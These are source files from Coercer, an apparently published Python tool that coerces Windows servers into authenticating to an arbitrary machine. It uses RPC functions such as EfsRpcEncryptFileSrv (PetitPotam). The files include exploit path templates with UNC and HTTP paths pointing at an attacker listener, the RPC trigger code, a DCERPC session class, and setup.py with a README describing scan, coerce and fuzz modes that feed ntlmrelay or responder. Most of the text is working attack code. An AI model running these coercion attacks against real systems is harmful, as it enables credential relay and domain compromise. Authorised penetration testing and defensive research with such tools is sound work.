            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\x00'),
            ("smb", 'UNC\\{{listener}}\\\x00'),
            ("smb", 'UNC\\{{listener}}\x00'),

            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\\x00'),
            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\x00'),
            ("smb", 'UNC:\\{{listener}}\\\x00'),
            ("smb", 'UNC:\\{{listener}}\x00'),

            ("http", 'http://{{listener}}/EndpointName/File.txt\x00'),
            ("http", 'http://{{listener}}/EndpointName/\x00'),
            ("http", 'http://{{listener}}/\x00'),
            ("http", 'http://{{listener}}\x00'),

            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\File.txt\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\\\x00'),
            ("http", 'file://\\\\{{listener}}\\EndpointName\x00'),
        ]

    paths = []
    for auth_type, exploit_path in templates:
        if desired_auth_type is not None:
            if auth_type == desired_auth_type:
                paths.append((auth_type, exploit_path))
        else:
            paths.append((auth_type, exploit_path))
    return paths


def generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445):
    # Declaring template functions
    rnd = gen_random_name

    if smb_listen_port is not None and smb_listen_port != 445:
        smb_listen_port = "@%d" % smb_listen_port
    else:
        smb_listen_port = ""

    if http_listen_port is not None:
        http_listen_port = "@%d" % http_listen_port
    else:
        http_listen_port = "@80"

    # Rendering template
    exploit_path = jinja2.Template(template).render(
        listener=listener,
        rnd=rnd,
        http_listen_port=http_listen_port,
        smb_listen_port=smb_listen_port
    )
    return exploit_path



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : EfsRpcEncryptFileSrv.py
# Author             : Podalirius (@podalirius_)
# Date created       : 16 Sep 2022


from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class _EfsRpcEncryptFileSrv(NDRCALL):
    """
    Structure to make the RPC call to EfsRpcEncryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
    """
    opnum = 4
    structure = (
        ('FileName', WSTR),  # Type: wchar_t *
    )


class _EfsRpcEncryptFileSrvResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to EfsRpcEncryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
    """
    structure = ()


class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcEncryptFileSrv (opnum 4) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    function = {
        "name": "EfsRpcEncryptFileSrv",
        "opnum": 4,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        if dcerpc_session is not None:
            try:
                request = _EfsRpcEncryptFileSrv()
                request['FileName'] = self.path
                resp = dcerpc_session.request(request)
                return ""
            except Exception as err:
                return err
        else:
            print("[!] Error: dce is None, you must call connect() first.")
            return None



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : setup.py
# Author             : Podalirius (@podalirius_)
# Date created       : 17 Jul 2022

import setuptools

long_description = """
# Coercer

<p align="center">
  A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.
  <br>
  <img alt="PyPI" src="https://img.shields.io/pypi/v/coercer">
  <img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/p0dalirius/Coercer">
  <a href="https://twitter.com/intent/follow?screen_name=podalirius_" title="Follow"><img src="https://img.shields.io/twitter/follow/podalirius_?label=Podalirius&style=social"></a>
  <a href="https://www.youtube.com/c/Podalirius_?sub_confirmation=1" title="Subscribe"><img alt="YouTube Channel Subscribers" src="https://img.shields.io/youtube/channel/subscribers/UCF_x5O7CSfr82AfNVTKOv_A?style=social"></a>
  <br>
</p>


## Features

 - Core:
    + [x] Lists open SMB pipes on the remote machine (in modes [scan](./documentation/Scan-mode.md) authenticated and [fuzz](./documentation/Fuzz-mode.md) authenticated)
    + [x] Tries to connect on a list of known SMB pipes on the remote machine (in modes [scan](./documentation/Scan-mode.md) unauthenticated and [fuzz](./documentation/Fuzz-mode.md) unauthenticated)
    + [x] Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.
    + [x] Random UNC paths generation to avoid caching failed attempts (all modes)
    + [x] Configurable delay between attempts with `--delay`
 - Options:
    + [x] Filter by method name with `--filter-method-name` or by protocol name with `--filter-protocol-name` (all modes) 
    + [x] Target a single machine `--target` or a list of targets from a file with `--targets-file`
    + [x] Specify IP address OR interface to listen on for incoming authentications. (modes [scan](./documentation/Scan-mode.md) and [fuzz](./documentation/Fuzz-mode.md))
 - Exporting results
    + [x] Export results in SQLite format (modes [scan](./documentation/Scan-mode.md) and [fuzz](./documentation/Fuzz-mode.md))
    + [x] Export results in JSON format (modes [scan](./documentation/Scan-mode.md) and [fuzz](./documentation/Fuzz-mode.md))
    + [x] Export results in XSLX format (modes [scan](./documentation/Scan-mode.md) and [fuzz](./documentation/Fuzz-mode.md))

## Installation

You can now install it from pypi (latest version is <img alt="PyPI" src="https://img.shields.io/pypi/v/coercer">) with this command:

```
sudo python3 -m pip install coercer
```

## Quick start

 - You want to **assess** the Remote Procedure Calls listening on a machine to see if they can be leveraged to coerce an authentication?
   + Use [**scan** mode](./documentation/Scan-mode.md), example:

    https://user-images.githubusercontent.com/79218792/204374471-bc5094a3-8539-4df7-842e-faadcaf9c945.mp4

 - You want to **exploit** the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder?
   + Use [**coerce** mode](./documentation/Coerce-mode.md), example:

    https://user-images.githubusercontent.com/79218792/204372851-4ba461ed-6812-4057-829d-0af6a06b0ecc.mp4
   
 - You are doing **research** and want to fuzz Remote Procedure Calls listening on a machine with various paths?
   + Use [**fuzz** mode](./documentation/Fuzz-mode.md), example:

    https://user-images.githubusercontent.com/79218792/204373310-64f90835-b544-4760-b0a3-3071429b3940.mp4

---

## Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

## Credits

 - [@tifkin_](https://twitter.com/tifkin_) and [@elad_shamir](https://twitter.com/elad_shamir) for finding and implementing **PrinterBug** on [MS-RPRN](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1)
 - [@topotam77](https://twitter.com/topotam77) for finding and implementing **PetitPotam** on [MS-EFSR](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 - [@topotam77](https://twitter.com/topotam77) for finding and [@_nwodtuhs](https://twitter.com/_nwodtuhs) for implementing **ShadowCoerce** on [MS-FSRVP](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
 - [@filip_dragovic](https://twitter.com/filip_dragovic) for finding and implementing **DFSCoerce** on [MS-DFSNM](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
"""

with open('requirements.txt', 'r', encoding='utf-8') as f:
    requirements = [x.strip() for x in f.readlines()]

setuptools.setup(
    name="coercer",
    version="2.2",
    description="",
    url="https://github.com/p0dalirius/Coercer",
    author="Podalirius",
    long_description=long_description,
    long_description_content_type="text/markdown",
    author_email="podalirius@protonmail.com",
    packages=["coercer", "coercer.core", "coercer.methods", "coercer.models", "coercer.network"],
    package_data={'coercer': ['coercer/methods/']},
    include_package_data=True,
    license="GPL2",
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
    install_requires=requirements,
    entry_points={
        'console_scripts': ['Coercer=coercer.__main__:main']
    }
)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : DCERPCSession.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022

import sys
from impacket.dcerpc.v5 import transport
from impacket.uuid import uuidtup_to_bin
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY


class DCERPCSession(object):
    """
    Documentation for class DCERPCSession
    """

    __rpctransport = None
    session = None
    target = None

    def __init__(self, credentials, verbose=False):
        super(DCERPCSession, self).__init__()
        self.__verbose = True
        self.credentials = credentials

    def connect_ncacn_np(self, target, pipe, targetIp=None, debug=False):
        """

        """
        self.target = target
        ncan_target = r'ncacn_np:%s[%s]' % (target, pipe)
        self.__rpctransport = transport.DCERPCTransportFactory(ncan_target)

        debug = False

        if hasattr(self.__rpctransport, 'set_credentials'):
            self.__rpctransport.set_credentials(
                username=self.credentials.username,
                password=self.credentials.password,
                domain=self.credentials.domain,
                lmhash=self.credentials.lmhash,
                nthash=self.credentials.nthash
            )

        if self.credentials.doKerberos == True:
            self.__rpctransport.set_kerberos(self.credentials.doKerberos, kdcHost=self.credentials.kdcHost)
        if targetIp is not None:
            self.__rpctransport.setRemoteHost(targetIp)

        self.session = self.__rpctransport.get_dce_rpc()
        self.session.set_auth_type(RPC_C_AUTHN_WINNT)
        self.session.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

        # Connecting to named pipe
        if debug:
            print("   [>] Connecting to %s ... " % ncan_target, end="")
            sys.stdout.flush()
        try:
            self.session.connect()
        except Exception as e:
            if debug:
                print("\x1b[1;91mfail\x1b[0m")
                print("      [!] Something went wrong, check error status => %s" % str(e))
            return None
        else:
            if debug:
                print("\x1b[1;92msuccess\x1b[0m")
        return self.session

    def bind(self, interface_uuid, interface_version, debug=False):
        """

        """
        # Binding to interface
        if debug:
            print("   [>] Binding to interface <uuid='%s', version='%s'> ... " % (interface_uuid, interface_version), end="")
            sys.stdout.flush()
        try:
            self.session.bind(uuidtup_to_bin((interface_uuid, interface_version)))
        except Exception as e:
            if debug:
                print("\x1b[1;91mfail\x1b[0m")
                print("      [!] Something went wrong, check error status => %s" % str(e))
            return False
        else:
            if debug:
                print("\x1b[1;92msuccess\x1b[0m")
        return True

    def set_verbose(self, value):
        """
        set_verbose(value)

        Sets the current verbosity level
        """
        self.__verbose = value

    def get_verbose(self):
        """
        get_verbose()

        Gets the current verbosity level
        """
        return self.__verbose